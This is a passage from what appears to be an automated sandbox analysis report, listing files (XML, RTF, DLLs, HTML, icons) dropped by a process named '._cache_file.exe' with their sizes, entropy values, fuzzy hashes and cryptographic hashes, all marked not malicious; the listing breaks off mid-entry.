                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (565), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):39246
                                                                                            Entropy (8bit):3.5443015320810485
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4kV2hG9aXQSDpI53/aQS0WAv+VXxwVcPI/tOiQC4+3bpKQVz5FB0zJOkue6Jjfz3:4M2hJAep4tVNx9SJOkR6NXaxu
                                                                                            MD5:5486FF60B072102EE3231FD743B290A1
                                                                                            SHA1:D8D8A1D6BF6ADF1095158B3C9B0A296A037632D0
                                                                                            SHA-256:5CA3ECAA12CA56F955D403CA93C4CB36A7D3DCDEA779FC9BDAA0CDD429DAB706
                                                                                            SHA-512:AE240EAAC32EDB18FD76982FC01E03BD9C8E40A9EC1B9C42D7EBD225570B7517949E045942DBB9E40E620AA9DCC9FBE0182C6CF207AC0A44D7358AD33BA81472
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):17240
                                                                                            Entropy (8bit):5.151474565875158
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
                                                                                            MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
                                                                                            SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
                                                                                            SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
                                                                                            SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                            Category:dropped
                                                                                            Size (bytes):7080
                                                                                            Entropy (8bit):4.934776172726828
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:9fcddvfbS9u6zZ+kodpj4eQ1lhcgi5X90vJqpsSih2:y/fbSZ/odpjmlhcgi5NSkRA2
                                                                                            MD5:19D028345AADCC05697EEC6D8C5B5874
                                                                                            SHA1:70BD3D4D51373FB82F0257F28D5F3609BFC82520
                                                                                            SHA-256:F4FF4EACE31B75176A0806E1693041D546D2599AEC0C77D295BAD09CAC7D9FE7
                                                                                            SHA-512:9B3DFFEC7C1595197AF69E59094588541558BEF56982475DDDD2C9E3D75FC8B970B384452713632AE20435EC0CAEC6CC4CD8CEC9CD4B4809335FDC9F2CC7B842
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (619), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):41524
                                                                                            Entropy (8bit):3.5542569352968996
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4GrYAiJoFb1Z0eQiFaD4EbJeiI5l9MwLnIBknXoFXYnZCoroUnAJJFHq20/kFR/0:4GZwoR1c5ryhnbHIJR0kbG52gjfVv
                                                                                            MD5:4CE519F7E9754EC03768EDEEDAEED926
                                                                                            SHA1:213AE458992BF2C5A255991441653C5141F41B89
                                                                                            SHA-256:BC4CA5AD609F0DD961263715E1F824524C43E73B744E55F90C703B759CAE4D31
                                                                                            SHA-512:8F2FF08A234D8E2E6BA85DE3CD1C19A0B372D9FCA4FF0FC1BBA7FE7C5A165E933E2AF5F93FC587E9230A066B70FB55D9F58256DB509CC95A3B31D349F860F510
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.112489568342605
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                                                            MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                                                            SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                                                            SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                                                            SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):162915
                                                                                            Entropy (8bit):5.023428742885146
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Xn6ipERiA7JzI3ilBEBr97dQnKG5zpZ27KN4:KiZ
                                                                                            MD5:BBBBB0BDA00FDA985BB39FEE5FD04FF8
                                                                                            SHA1:3053CF30FAD92F133AD3EA7EEFB8C729D323EA00
                                                                                            SHA-256:3CB591E6801E91FE58E79449F7C99B88C3BA0ACE5D922B4AA0C8F2CDD81854BD
                                                                                            SHA-512:32CC1B0F033B13D7614F8BD80DE4D3F9D4668632010BCB563E90773FB2F4971D19206C46B0C2B0E55308CA14F4DEAF5EB415DAE5F2C0C4331B5DF0AE44B2F61E
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40320
                                                                                            Entropy (8bit):3.5296220359665447
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4h9o3CMa9e1yzNZNs4fLCAEJ0o5H/PuRv:9aug8J1u
                                                                                            MD5:FE6B23186C2D77F7612BF7B1018A9B2A
                                                                                            SHA1:1528EC7633E998F040D2D4C37AC8A7DC87F99817
                                                                                            SHA-256:03BBE1A39C6716F07703D20ED7539D8BF13B87870C2C83DDDA5445C82953A80A
                                                                                            SHA-512:40C9C9F3607CAB24655593FC4766829516DE33F13060BE09F5EE65578824AC600CC1C07FE71CDD48BFF7F52B447FF37C0D161D755A69AC7DB7DF118DA6DB7649
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18264
                                                                                            Entropy (8bit):5.142702232041524
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                                                            MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                                                            SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                                                            SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                                                            SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):189369
                                                                                            Entropy (8bit):4.993456059906976
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:8K91dpBgRJA8J/snalBEm0OgKXIJR10GZybh2C:8aK
                                                                                            MD5:F1602100F6C135AB5D8026E9248BAF02
                                                                                            SHA1:DEBE92E8761F5320352DCFFE844FB25A10E9EA14
                                                                                            SHA-256:284A8BBA438DA22A1B4F497B0B4ED1D9886184859527B87FF7350C83F198AB2D
                                                                                            SHA-512:2A0FBEF3114B54EDB400D913D317A5097801834BEE0FB536B0FF645DD1CA40A1451945AD563119A5BA80F26B51CDA8B23E93BE71D7C82723AFEDE3CBF1DA00C6
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (440), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):34294
                                                                                            Entropy (8bit):4.383454074704535
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4O3Oo45AyAYcou3DDn6UrMhsrHZmxqJOXhNCGYHre3iR7v:4O3OoMIYcBCOXJ6koIv
                                                                                            MD5:6F86B79DBF15E810331DF2CA77F1043A
                                                                                            SHA1:875ED8498C21F396CC96B638911C23858ECE5B88
                                                                                            SHA-256:F0F9DD1A9F164F4D2E73B4D23CC5742DA2C39549B9C4DB692283839C5313E04F
                                                                                            SHA-512:CA233A6BF55E253EBF1E8180A326667438E1124F6559054B87021095EF16FFC6B0C87361E0922087BE4CA9CABD10828BE3B6CC12C4032CB7F2A317FDBD76F818
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):15704
                                                                                            Entropy (8bit):5.929554826924656
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                                                            MD5:278FD7595B580A016705D00BE363612F
                                                                                            SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                                                            SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                                                            SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):181054
                                                                                            Entropy (8bit):4.962328655200384
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:7vykJ9MRJAwJjAXetBE1rRbe+KusGWqcJ2V:fJ
                                                                                            MD5:89D66A0B94450729015D021BC8F859E9
                                                                                            SHA1:C9AD4C7DCDAFEAD282DAA1C214E7A0EAB567FFD5
                                                                                            SHA-256:6A1884515CC4378D732F681934658252A4B45D76CE7F53CF8650BE794CC8D390
                                                                                            SHA-512:336A5B1CBF2F52DF5B151A564C8452826D253F9FC565C865D7BA37B91229996D9AE59603350BD5CD99352ED63D265D8578095560CB7DE67DA7E1AA2135FBF0FB
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (439), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):32962
                                                                                            Entropy (8bit):4.366645511984528
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4cxsW0TwUrhmUgEMDQdCAtTN/2JWCTJSIQvPaLWL2K4oH/Drv:4cxszjrxgEMDQdpFN7IJSIQvkQvLH/Pv
                                                                                            MD5:E87AD0B3BF73F3E76500F28E195F7DC0
                                                                                            SHA1:716B842F6FBF6C68DC9C4E599C8182BFBB1354DC
                                                                                            SHA-256:43B351419B73AC266C4B056A9C3A92F6DFA654328163814D17833A837577C070
                                                                                            SHA-512:D3EA8655D42A2B0938C2189CEEAB25C29939C302C2E2205E05D6059AFC2A9B2039B21C083A7C17DA1CE5EEBDC934FF327A452034E2E715E497BCD6239395774C
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):15192
                                                                                            Entropy (8bit):5.9622226182057325
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                                                            MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                                                            SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                                                            SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                                                            SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):351492
                                                                                            Entropy (8bit):4.844773730829239
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bNK7z5n/OLs3+lAB4HeqyOOZjYCrv1MT2hhO0kN9okLgd80UKdF8K8Zb4ajD/y9m:bI79kaIDUhOhQAUiK/9/MjZr
                                                                                            MD5:8203E9FC25A5720AFB8C43E8BE10C3B0
                                                                                            SHA1:FC7D9B452B6D5475FD1EF61B78E8BC6E32F08974
                                                                                            SHA-256:0EBD62213F41DFFA0BCD939BDC6ABC25096E95112C217FDF27CE661A19AD0866
                                                                                            SHA-512:F95DCB9C25436AE322C240A0D0ABD9F4904A5AF313CAC5CB8C90C1A5460DAD8E983347AD7540C672046E4210945B053B75313BB6D10B44B2A0BF0024B400E81E
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (634), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40428
                                                                                            Entropy (8bit):4.233211278958208
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4qwoGD2VLQa0inkyZfrOh+++NA3aJW5cGUT3CT+v:DVVJl
                                                                                            MD5:1290BE72ED991A3A800A6B2A124073B2
                                                                                            SHA1:DAC09F9F2CCB3B273893B653F822E3DFC556D498
                                                                                            SHA-256:6BA9A2E4A6A58F5BB792947990E51BABD9D5151A7057E1A051CB007FEA2EB41C
                                                                                            SHA-512:C0B8B4421FCB2AABE2C8C8773FD03842E3523BF2B75D6262FD8BD952ADC12C06541BDAE0219E89F9F9F8D79567A4FE4DFF99529366C4A7C5BF66C218431F3217
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18264
                                                                                            Entropy (8bit):5.548909804205606
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
                                                                                            MD5:7EF74AF6AB5760950A1D233C582099F1
                                                                                            SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
                                                                                            SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
                                                                                            SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):213363
                                                                                            Entropy (8bit):4.934134633374225
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:D/fSz7yMsMyN1FyRtXSWS3SoSalsySMDS7SmSJ8SUSPsBa5IqDSySipSAS6ASGS+:pG
                                                                                            MD5:5B95EFBC01DC97EE9A6C6F64A49AA62D
                                                                                            SHA1:A99C984A0D5E316FE60D588A3519F2D5C805C1DE
                                                                                            SHA-256:0CFACFF2B63121AD1D71376E4A3799B93B7E6D278209FE4806CCA0F74830CFC1
                                                                                            SHA-512:A0B19864E68945A74BCE24C8D5EB0050ABB66C6FF6A53D0482FFA70E93EEE2957608BB9BDE535718D56CD5D7509B4DD7A1786C99BC2120344293234B7A6C2A3B
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (390), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):31138
                                                                                            Entropy (8bit):4.240036868712424
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4QD7cJwYXzOnyqqgafOAXUmUfMcq0JywXk83GJPupIoxnb/2v:4QD7cJxXC/qgaffXUmUi0JyoknJY9b+v
                                                                                            MD5:150B5C3D1B452DCCBE8F1313FDA1B18C
                                                                                            SHA1:7128B6B9E84D69C415808F1D325DD969B17914CC
                                                                                            SHA-256:6D4EB9DCA1CBCD3C2B39A993133731750B9FDF5988411F4A6DA143B9204C01F2
                                                                                            SHA-512:A45A1F4F19A27558E08939C7F63894FF5754E6840DB86B8C8C68D400A36FB23179CAFF164D8B839898321030469B56446B5A8EFC5765096DEE5E8A746351E949
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14168
                                                                                            Entropy (8bit):6.010838262457833
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
                                                                                            MD5:407CDB7E1C2C862B486CDE45F863AE6E
                                                                                            SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
                                                                                            SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
                                                                                            SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):225202
                                                                                            Entropy (8bit):4.985888615397263
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:0pvaMOA6EOEGJA7JDnbyiBTmAO3FQ31Rdz5Zq3Kho:6v+Ez0
                                                                                            MD5:6E5BDDF58163B11C79577B35A87A4424
                                                                                            SHA1:8AAA1008360F7B255A6A88AD02D3A00DEB8B0AE6
                                                                                            SHA-256:D4A26E3756437CA8BA132AE3A73AA7A829478A847D6B9AB69A8090515CE9A60A
                                                                                            SHA-512:21DD9D754C0A3A383F20259E87AA4769D6ECB36753039DCE8B644E16E0ABC3C94B4B850648E0369474C914655140E7F3CC3E808ED27E70892A863F61F8588C6E
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (616), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40912
                                                                                            Entropy (8bit):3.5296761558263756
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4fcA4U4d+uYWFHO/xGeftjG2QDu7Jr++dP8z3AzOrv:BoZWFu//xWCJi8Pg32Y
                                                                                            MD5:05A95593C61C744759E52CAF5E13502E
                                                                                            SHA1:0054833D8A7A395A832E4C188C4D012301DD4090
                                                                                            SHA-256:1A3E5E49DA88393A71EA00D73FEE7570E40EDB816B72622E39C7FCD09C95EAD1
                                                                                            SHA-512:00AEE4C02F9D6374560F7D2B826503AAB332E1C4BC3203F88FE82E905471EC43F92F4AF4FC52E46F377E4D297C2BE99DAF94980DF2CE7664C169552800264FD3
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.182140892959793
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                                                            MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                                                            SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                                                            SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                                                            SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):152458
                                                                                            Entropy (8bit):5.013297113523102
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:4zkouwFDNSMUYugRJA8J/snalBEm0OgKXIJR10GZybh2U:4zDNIYt
                                                                                            MD5:A920D4F55EAE5FEBAB1082AB2BCC2439
                                                                                            SHA1:CBD631427871B620E9C95417788BFCDD1CD0A2A5
                                                                                            SHA-256:2FFF2122C4D176E074365775227D4208AF48F2F921BE7623EDC315CD345ACF0B
                                                                                            SHA-512:28135FBD9D940F0DEEC7A059AB2998B034575CC5D6DD31B1BE501B60689860478B0A0AB5183C69B2ACBBB9C1A074BBAA215960B3FACC6A9A3B0170E27E7B2B47
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):16118
                                                                                            Entropy (8bit):3.6434775915277604
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):88533
                                                                                            Entropy (8bit):7.210526848639953
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                                                            MD5:F9657D290048E169FFABBBB9C7412BE0
                                                                                            SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                                                            SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                                                            SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):4.923507556620034
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                                                            MD5:7E55DDC6D611176E697D01C90A1212CF
                                                                                            SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                                                            SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                                                            SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5118974066097444
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
                                                                                            MD5:26A00597735C5F504CF8B3E7E9A7A4C1
                                                                                            SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
                                                                                            SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
                                                                                            SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5178766234336925
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
                                                                                            MD5:8419CAA81F2377E09B7F2F6218E505AE
                                                                                            SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
                                                                                            SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
                                                                                            SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5189797450574103
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
                                                                                            MD5:924FD539523541D42DAD43290E6C0DB5
                                                                                            SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
                                                                                            SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
                                                                                            SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5119705312617957
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
                                                                                            MD5:BB55B5086A9DA3097FB216C065D15709
                                                                                            SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
                                                                                            SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
                                                                                            SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5083713071878764
